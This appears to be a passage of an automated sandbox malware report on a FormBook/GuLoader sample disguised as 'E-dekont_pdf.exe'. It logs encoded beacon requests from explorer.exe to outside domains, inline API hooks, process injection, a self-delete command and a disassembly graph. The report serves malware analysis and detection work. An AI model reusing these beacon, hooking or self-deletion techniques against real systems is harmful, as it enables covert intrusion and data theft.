                                                                                            Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 d5 bf bd ad cf b2 d8 bf ca d0 b3 a1 d3 aa cf fa d3 d0 cf de b9 ab cb be 27 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 74 69 74 6c 65 3e 26 23 32 35 39 36 38 3b 26 23 32 33 33 39 38 3b 26 23 33 35 38 33 38 3b 26 23 32 30 31 39 35 3b 26 23 33 34 39 32 30 3b 26 23 33 36 32 37 36 3b 26 23 31 39 39 37 39 3b 26 23 33 35 37 35 33 3b 26 23 32 35 31 30 35 3b 26 23 32 36 37 34 32 3b 26 23 33 30 33 34 30 3b 26 23 32 30 33 31 36 3b 26 23 32 35 39 39 31 3b 2c 26 23 32 32 38 39 39 3b 26 23 32 30 31 35 34 3b 26 23 31 39 39 37 39 3b 26 23 33 37 30 39 36 3b 26 23 33 38 35 34 34 3b 26 23 33 31 31 36 39 3b 26 23 32 35 31 37 30 3b 26 23 32 34 33 32 30 3b 26 23 32 32 32 37 30 3b 26 23 32 39 32 35 35 3b 2c 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 31 39 39 38 31 3b 26 23 33 35 32 36 35 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 33 35 32 36 35 3b 26 23 32 30 30 31 33 3b 26 23 32 35 39 39 31 3b 26 23 32 33 33 38 33 3b 26 23 32 34 31 34 39 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 2c 26 23 32 30 30 31 33 3b 26 23 32 32 32 36 39 3b 26 23 33 32 37 36 39 3b 26 23 32 32 38 32 36 3b 26 23 32 33 31 31 30 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 31 32 30 3b 26 23 31 32 30 3b 26 23 31 32 30 3b 26 23 31 32 30 3b 26 23 31 32 30 3b 2c 26 23 32 39 30 38 37 3b 26 23 32 32 39 31 39 3b 26 23 32 30 31 35 34 3b 26 23 32 32 39 37 31 3b 26 23 32 38 36 30 38 3b 26 23 32 34 37 37 33 3b 26 23 32 30 35 39 39 3b 26 23 32 39 32 34 35 3b 26 23 32 35 39 39 31 3b 2c 26 23 32 33 30 34 37 3b 26 23 32 33 32 37 33 3b 26 23 33 31 38 39 35 3b 26 23 32 32 38 32 33 3b 26 23 32 35 37 34 35 3b 26 23 32 34 33 32 30 3b 26 23 32 38 37 34 38 3b 26 23 32 38 33 38 35 3b 26 23 32 37 39 38 37 3b 26 23 32 37 39 37 34 3b 26 23 31 31 30 3b 26 23 31 31 32 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 35 39 36 38 3b 26 23 32 33 33 39 38 3b 26 23 33 35 38 33 38 3b 26 23 32 30 31 39 35 3b 26 23 33 34 39 32 30 3b 26 23 33 36 32 37 36 3b 26 23 31 39 39 37 39 3b 26 23 33 35 37 35 33 3b 26 23 32 35 31 30 35 3b 26 23 32 36 37 34 32 3b 26 23 33 30 33 34 30 3b 26 23 32 30 33 31 36 3b 26 23 32 35 39 39 31 3b 2c 26 23 32 32 38 39 39 3b 26 23 32 30 31 35 34 3b 26 23 31 39 39 37 39 3b 26 23 33 37 30 39 36 3b 26 23 33 38 35 34 34 3b 26 23 33 31 31 36 39 3b 26 23 32 35 31 37 30 3b 26 23 32 34 33 32 30 3b 26 23 32 32 32 37 30 3b 26 23 32 39 32 35 35 3b 2c 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 31 39 39 38 31 3b 26 23 33 35 32 36 35 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 33 35 32 36 35 3b 26 23 32 30 30 31 33 3b 26 23 32 35 39 39 31 3b 26 23 32 33 33 38 33 3b 26 23 32 34 31 34 39 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 2c 26 23 32 30 30 31 33 3b 26 23 32 32 32 36 39 3b 26 23 33 32 37 36 39 3b 26 23 32 32 38 32 36 3b 26 23 32 33 31 31 30 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 31 32 30 3b 26 23 31 32 30 3b 26 23 31 32 30 3b 26 23 31 32 30 3b 26 23 31 32 30 3b 2c 26 23 32 39 30 38 37 3b 26 23 32 32 39 31 39 3b 26 23 32 30 31 35 34 3b 26
                                                                                            Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>&#25968;&#23398;&#35838;&#20195;&#34920;&#36276;&#19979;&#35753;&#25105;&#26742;&#30340;&#20316;&#25991;,&#22899;&#20154;&#19979;&#37096;&#38544;&#31169;&#25170;&#24320;&#22270;&#29255;,&#20037;&#20037;&#19981;&#35265;&#20037;&#20037;&#35265;&#20013;&#25991;&#23383;&#24149;&#20813;&#36153;,&#20013;&#22269;&#32769;&#22826;&#23110;&#98;&#98;&#98;&#98;&#98;&#120;&#120;&#120;&#120;&#120;,&#29087;&#22919;&#20154;&#22971;&#28608;&#24773;&#20599;&#29245;&#25991;,&#23047;&#23273;&#31895;&#22823;&#25745;&#24320;&#28748;&#28385;&#27987;&#27974;&#110;&#112;</title><meta name="keywords" content="&#25968;&#23398;&#35838;&#20195;&#34920;&#36276;&#19979;&#35753;&#25105;&#26742;&#30340;&#20316;&#25991;,&#22899;&#20154;&#19979;&#37096;&#38544;&#31169;&#25170;&#24320;&#22270;&#29255;,&#20037;&#20037;&#19981;&#35265;&#20037;&#20037;&#35265;&#20013;&#25991;&#23383;&#24149;&#20813;&#36153;,&#20013;&#22269;&#32769;&#22826;&#23110;&#98;&#98;&#98;&#98;&#98;&#120;&#120;&#120;&#120;&#120;,&#29087;&#22919;&#20154;&
                                                                                            Apr 17, 2023 08:59:58.426613092 CEST301INData Raw: 23 32 32 39 37 31 3b 26 23 32 38 36 30 38 3b 26 23 32 34 37 37 33 3b 26 23 32 30 35 39 39 3b 26 23 32 39 32 34 35 3b 26 23 32 35 39 39 31 3b 2c 26 23 32 33 30 34 37 3b 26 23 32 33 32 37 33 3b 26 23 33 31 38 39 35 3b 26 23 32 32 38 32 33 3b 26 23
                                                                                            Data Ascii: #22971;&#28608;&#24773;&#20599;&#29245;&#25991;,&#23047;&#23273;&#31895;&#22823;&#25745;&#24320;&#28748;&#28385;&#27987;&#27974;&#110;&#112;" /><meta name="description" content="&#25968;&#23398;&#35838;&#20195;&#34920;&#36276;&#19979;&#35753


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            6192.168.11.204986634.102.136.18080C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Apr 17, 2023 09:00:38.770996094 CEST309OUTGET /mi94/?7n-Lh=aUhQPVU+b+KmCO5n+t9BjzZYrvo3RulPNqdvt5v9fBahIfZoi9X6HoXk4Ou54UhVLO4i&7nrLOp=h2JXJD HTTP/1.1
                                                                                            Host: www.elatedfreedom.com
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            Apr 17, 2023 09:00:38.883100986 CEST309INHTTP/1.1 403 Forbidden
                                                                                            Server: openresty
                                                                                            Date: Mon, 17 Apr 2023 07:00:38 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 291
                                                                                            ETag: "643cc32a-123"
                                                                                            Via: 1.1 google
                                                                                            Connection: close
                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                            Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            7192.168.11.2049867188.114.96.380C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Apr 17, 2023 09:00:59.237935066 CEST310OUTGET /mi94/?7n-Lh=6B2qrP5xTIPXUhljWLKFvclCy31c2DfKa32CVCvYSfVUhLKBGq8rlAeXXt8b11SpmRrr&7nrLOp=h2JXJD HTTP/1.1
                                                                                            Host: www.sneakersuomo.com
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            Apr 17, 2023 09:00:59.449495077 CEST311INHTTP/1.1 301 Moved Permanently
                                                                                            Date: Mon, 17 Apr 2023 07:00:59 GMT
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Location: https://www.sneakersuomo.com/mi94/?7n-Lh=6B2qrP5xTIPXUhljWLKFvclCy31c2DfKa32CVCvYSfVUhLKBGq8rlAeXXt8b11SpmRrr&7nrLOp=h2JXJD
                                                                                            CF-Cache-Status: DYNAMIC
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ti4JmFK9YqLxhs9v1uRock3VtBEG2iAA0dn2WiVt8EvGk7qldIxicEfKtX5KYIHBNBFpotW8cWqMTIp%2B2HA5QBZWoWTmHb0qWENbueJgxpGU8tvSnNlpz96VCEpNrXkkA24fxe28tg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 7b92cb4e48079b39-FRA
                                                                                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            8192.168.11.204986864.246.164.13480C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Apr 17, 2023 09:01:20.051949978 CEST312OUTGET /mi94/?7n-Lh=r2OEULnHovTrNfOCpsXB+B/EQ9/SU+ZHOlmwsAm4HEL75U8ltjEZYIavfnqmba7EJm23&7nrLOp=h2JXJD HTTP/1.1
                                                                                            Host: www.jenniferfalconerrealtor.com
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            Apr 17, 2023 09:01:20.341221094 CEST313INHTTP/1.1 302 Found
                                                                                            date: Mon, 17 Apr 2023 07:01:20 GMT
                                                                                            server: Apache
                                                                                            expires: Sat, 26 Jul 1997 05:00:00 GMT
                                                                                            cache-control: no-cache, must-revalidate, private
                                                                                            pragma: no-cache
                                                                                            x-redirect-by: WordPress
                                                                                            location: https://moxiworks.com
                                                                                            content-length: 0
                                                                                            content-type: text/html; charset=UTF-8
                                                                                            v-backend: dugout13-pr
                                                                                            x-varnish: 503222677
                                                                                            age: 0
                                                                                            via: 1.1 varnish (Varnish/6.5)
                                                                                            x-app-server: varnish_dugout/dugout-varnish21-pr
                                                                                            connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            9192.168.11.204987081.171.22.580C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Apr 17, 2023 09:01:40.702073097 CEST321OUTGET /mi94/?7n-Lh=tEvJTIrtwEr1z3msC1pTUGnOTVGGiUUymk4IsDmqK+5oX++y4YqyxgOU0GtdL5bqNLwd&7nrLOp=h2JXJD HTTP/1.1
                                                                                            Host: www.hotcoa.com
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            Apr 17, 2023 09:01:40.736366987 CEST321INHTTP/1.1 302 Found
                                                                                            cache-control: max-age=0, private, must-revalidate
                                                                                            connection: close
                                                                                            content-length: 11
                                                                                            date: Mon, 17 Apr 2023 07:01:39 GMT
                                                                                            location: http://survey-smiles.com
                                                                                            server: nginx
                                                                                            set-cookie: sid=b435b9fc-dced-11ed-aff9-bb1c683709f5; path=/; domain=.hotcoa.com; expires=Sat, 05 May 2091 10:15:47 GMT; max-age=2147483647; HttpOnly
                                                                                            Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                                                                                            Data Ascii: Redirecting


                                                                                            Code Manipulations

                                                                                            User Modules

                                                                                            Hook Summary

                                                                                            Function NameHook TypeActive in Processes
                                                                                            PeekMessageAINLINEexplorer.exe
                                                                                            PeekMessageWINLINEexplorer.exe
                                                                                            GetMessageWINLINEexplorer.exe
                                                                                            GetMessageAINLINEexplorer.exe

                                                                                            Processes

                                                                                            Process: explorer.exe, Module: user32.dll
                                                                                            Function NameHook TypeNew Data
                                                                                            PeekMessageAINLINE0x48 0x8B 0xB8 0x83 0x3E 0xEF
                                                                                            PeekMessageWINLINE0x48 0x8B 0xB8 0x8B 0xBE 0xEF
                                                                                            GetMessageWINLINE0x48 0x8B 0xB8 0x8B 0xBE 0xEF
                                                                                            GetMessageAINLINE0x48 0x8B 0xB8 0x83 0x3E 0xEF

                                                                                            Statistics

                                                                                            CPU Usage

                                                                                            Click to jump to process

                                                                                            Memory Usage

                                                                                            Click to jump to process

                                                                                            High Level Behavior Distribution

                                                                                            Click to dive into process behavior distribution

                                                                                            Behavior

                                                                                            Click to jump to process

                                                                                            System Behavior

                                                                                            General

                                                                                            Target ID:1
                                                                                            Start time:08:56:54
                                                                                            Start date:17/04/2023
                                                                                            Path:C:\Users\user\Desktop\E-dekont_pdf.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Users\user\Desktop\E-dekont_pdf.exe
                                                                                            Imagebase:0x400000
                                                                                            File size:404480 bytes
                                                                                            MD5 hash:774EF0FCF3F7B089B008F54A5FAFC6FD
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000001.00000002.77085989629.0000000000696000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.77089327634.0000000007F17000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:low

                                                                                            General

                                                                                            Target ID:4
                                                                                            Start time:08:57:31
                                                                                            Start date:17/04/2023
                                                                                            Path:C:\Users\user\Desktop\E-dekont_pdf.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Users\user\Desktop\E-dekont_pdf.exe
                                                                                            Imagebase:0x400000
                                                                                            File size:404480 bytes
                                                                                            MD5 hash:774EF0FCF3F7B089B008F54A5FAFC6FD
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.77117129709.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.77117129709.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.77117129709.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.77117129709.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.77117129709.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                            Reputation:low

                                                                                            General

                                                                                            Target ID:5
                                                                                            Start time:08:57:47
                                                                                            Start date:17/04/2023
                                                                                            Path:C:\Windows\explorer.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\Explorer.EXE
                                                                                            Imagebase:0x7ff79b010000
                                                                                            File size:4849904 bytes
                                                                                            MD5 hash:5EA66FF5AE5612F921BC9DA23BAC95F7
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000005.00000002.81576835663.000000000AA8E000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                            Reputation:high

                                                                                            General

                                                                                            Target ID:6
                                                                                            Start time:08:57:52
                                                                                            Start date:17/04/2023
                                                                                            Path:C:\Windows\SysWOW64\colorcpl.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\SysWOW64\colorcpl.exe
                                                                                            Imagebase:0xcd0000
                                                                                            File size:86528 bytes
                                                                                            MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.81558628046.0000000004F50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.81558628046.0000000004F50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.81558628046.0000000004F50000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.81558628046.0000000004F50000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.81558628046.0000000004F50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.81558929567.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.81558929567.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.81558929567.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.81558929567.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.81558929567.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.81556941175.0000000003240000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.81556941175.0000000003240000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.81556941175.0000000003240000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.81556941175.0000000003240000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.81556941175.0000000003240000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                            Reputation:moderate

                                                                                            General

                                                                                            Target ID:7
                                                                                            Start time:08:57:56
                                                                                            Start date:17/04/2023
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:/c del "C:\Users\user\Desktop\E-dekont_pdf.exe"
                                                                                            Imagebase:0xd10000
                                                                                            File size:236544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high

                                                                                            General

                                                                                            Target ID:8
                                                                                            Start time:08:57:56
                                                                                            Start date:17/04/2023
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff6eedb0000
                                                                                            File size:875008 bytes
                                                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language

                                                                                            Disassembly

                                                                                            Reset < >

                                                                                              Execution Graph

                                                                                              Execution Coverage:18.5%
                                                                                              Dynamic/Decrypted Code Coverage:13.4%
                                                                                              Signature Coverage:15.7%
                                                                                              Total number of Nodes:1612
                                                                                              Total number of Limit Nodes:42
                                                                                              execution_graph 4401 403640 SetErrorMode GetVersionExW 4402 403692 GetVersionExW 4401->4402 4403 4036ca 4401->4403 4402->4403 4404 403723 4403->4404 4405 406a35 5 API calls 4403->4405 4492 4069c5 GetSystemDirectoryW 4404->4492 4405->4404 4407 403739 lstrlenA 4407->4404 4408 403749 4407->4408 4495 406a35 GetModuleHandleA 4408->4495 4411 406a35 5 API calls 4412 403757 4411->4412 4413 406a35 5 API calls 4412->4413 4414 403763 #17 OleInitialize SHGetFileInfoW 4413->4414 4501 406668 lstrcpynW 4414->4501 4417 4037b0 GetCommandLineW 4502 406668 lstrcpynW 4417->4502 4419 4037c2 4503 405f64 4419->4503 4422 4038f7 4423 40390b GetTempPathW 4422->4423 4507 40360f 4423->4507 4425 403923 4426 403927 GetWindowsDirectoryW lstrcatW 4425->4426 4427 40397d DeleteFileW 4425->4427 4429 40360f 12 API calls 4426->4429 4517 4030d0 GetTickCount GetModuleFileNameW 4427->4517 4428 405f64 CharNextW 4431 4037f9 4428->4431 4432 403943 4429->4432 4431->4422 4431->4428 4435 4038f9 4431->4435 4432->4427 4434 403947 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4432->4434 4433 403990 4436 403a54 4433->4436 4442 405f64 CharNextW 4433->4442 4477 403a45 4433->4477 4438 40360f 12 API calls 4434->4438 4603 406668 lstrcpynW 4435->4603 4657 403c25 4436->4657 4441 403975 4438->4441 4441->4427 4441->4436 4458 4039b2 4442->4458 4444 403b91 4447 403b99 GetCurrentProcess OpenProcessToken 4444->4447 4448 403c0f ExitProcess 4444->4448 4445 403b7c 4666 405cc8 4445->4666 4453 403bb0 LookupPrivilegeValueW AdjustTokenPrivileges 4447->4453 4454 403bdf 4447->4454 4450 403a1b 4604 40603f 4450->4604 4451 403a5c 4620 405c33 4451->4620 4453->4454 4456 406a35 5 API calls 4454->4456 4471 403be6 4456->4471 4458->4450 4458->4451 4461 403a72 lstrcatW 4462 403a7d lstrcatW lstrcmpiW 4461->4462 4462->4436 4464 403a9d 4462->4464 4463 403bfb ExitWindowsEx 4463->4448 4466 403c08 4463->4466 4468 403aa2 4464->4468 4469 403aa9 4464->4469 4670 40140b 4466->4670 4623 405b99 CreateDirectoryW 4468->4623 4628 405c16 CreateDirectoryW 4469->4628 4470 403a3a 4619 406668 lstrcpynW 4470->4619 4471->4463 4471->4466 4476 403aae SetCurrentDirectoryW 4478 403ac0 4476->4478 4479 403acb 4476->4479 4547 403d17 4477->4547 4631 406668 lstrcpynW 4478->4631 4632 406668 lstrcpynW 4479->4632 4484 403b19 CopyFileW 4489 403ad8 4484->4489 4485 403b63 4487 406428 36 API calls 4485->4487 4487->4436 4488 4066a5 17 API calls 4488->4489 4489->4485 4489->4488 4491 403b4d CloseHandle 4489->4491 4633 4066a5 4489->4633 4650 406428 MoveFileExW 4489->4650 4654 405c4b CreateProcessW 4489->4654 4491->4489 4493 4069e7 wsprintfW LoadLibraryExW 4492->4493 4493->4407 4496 406a51 4495->4496 4497 406a5b GetProcAddress 4495->4497 4498 4069c5 3 API calls 4496->4498 4499 403750 4497->4499 4500 406a57 4498->4500 4499->4411 4500->4497 4500->4499 4501->4417 4502->4419 4505 405f6a 4503->4505 4504 4037e8 CharNextW 4504->4431 4505->4504 4506 405f71 CharNextW 4505->4506 4506->4505 4673 4068ef 4507->4673 4509 403625 4509->4425 4510 40361b 4510->4509 4682 405f37 lstrlenW CharPrevW 4510->4682 4513 405c16 2 API calls 4514 403633 4513->4514 4685 406187 4514->4685 4689 406158 GetFileAttributesW CreateFileW 4517->4689 4519 403113 4546 403120 4519->4546 4690 406668 lstrcpynW 4519->4690 4521 403136 4691 405f83 lstrlenW 4521->4691 4525 403147 GetFileSize 4526 403241 4525->4526 4527 40315e 4525->4527 4696 40302e 4526->4696 4527->4526 4533 4032de 4527->4533 4540 40302e 32 API calls 4527->4540 4527->4546 4727 4035e2 4527->4727 4531 403286 GlobalAlloc 4534 40329d 4531->4534 4535 40302e 32 API calls 4533->4535 4538 406187 2 API calls 4534->4538 4535->4546 4536 403267 4537 4035e2 ReadFile 4536->4537 4539 403272 4537->4539 4541 4032ae CreateFileW 4538->4541 4539->4531 4539->4546 4540->4527 4542 4032e8 4541->4542 4541->4546 4711 4035f8 SetFilePointer 4542->4711 4544 4032f6 4712 403371 4544->4712 4546->4433 4546->4546 4548 406a35 5 API calls 4547->4548 4549 403d2b 4548->4549 4550 403d31 GetUserDefaultUILanguage 4549->4550 4551 403d43 4549->4551 4774 4065af wsprintfW 4550->4774 4790 406536 4551->4790 4554 403d41 4775 403fed 4554->4775 4556 403d92 lstrcatW 4556->4554 4557 406536 3 API calls 4557->4556 4560 40603f 18 API calls 4561 403dc4 4560->4561 4562 403e58 4561->4562 4565 406536 3 API calls 4561->4565 4563 40603f 18 API calls 4562->4563 4564 403e5e 4563->4564 4567 403e6e LoadImageW 4564->4567 4568 4066a5 17 API calls 4564->4568 4566 403df6 4565->4566 4566->4562 4571 403e17 lstrlenW 4566->4571 4575 405f64 CharNextW 4566->4575 4569 403f14 4567->4569 4570 403e95 RegisterClassW 4567->4570 4568->4567 4574 40140b 2 API calls 4569->4574 4572 403f1e 4570->4572 4573 403ecb SystemParametersInfoW CreateWindowExW 4570->4573 4576 403e25 lstrcmpiW 4571->4576 4577 403e4b 4571->4577 4572->4436 4573->4569 4578 403f1a 4574->4578 4579 403e14 4575->4579 4576->4577 4580 403e35 GetFileAttributesW 4576->4580 4581 405f37 3 API calls 4577->4581 4578->4572 4583 403fed 18 API calls 4578->4583 4579->4571 4582 403e41 4580->4582 4584 403e51 4581->4584 4582->4577 4585 405f83 2 API calls 4582->4585 4586 403f2b 4583->4586 4795 406668 lstrcpynW 4584->4795 4585->4577 4588 403f37 ShowWindow 4586->4588 4589 403fba 4586->4589 4591 4069c5 3 API calls 4588->4591 4783 40579d OleInitialize 4589->4783 4592 403f4f 4591->4592 4594 403f5d GetClassInfoW 4592->4594 4597 4069c5 3 API calls 4592->4597 4593 403fc0 4595 403fc4 4593->4595 4596 403fdc 4593->4596 4599 403f71 GetClassInfoW RegisterClassW 4594->4599 4600 403f87 DialogBoxParamW 4594->4600 4595->4572 4602 40140b 2 API calls 4595->4602 4598 40140b 2 API calls 4596->4598 4597->4594 4598->4572 4599->4600 4601 40140b 2 API calls 4600->4601 4601->4572 4602->4572 4603->4423 4811 406668 lstrcpynW 4604->4811 4606 406050 4812 405fe2 CharNextW CharNextW 4606->4812 4609 403a27 4609->4436 4618 406668 lstrcpynW 4609->4618 4610 4068ef 5 API calls 4616 406066 4610->4616 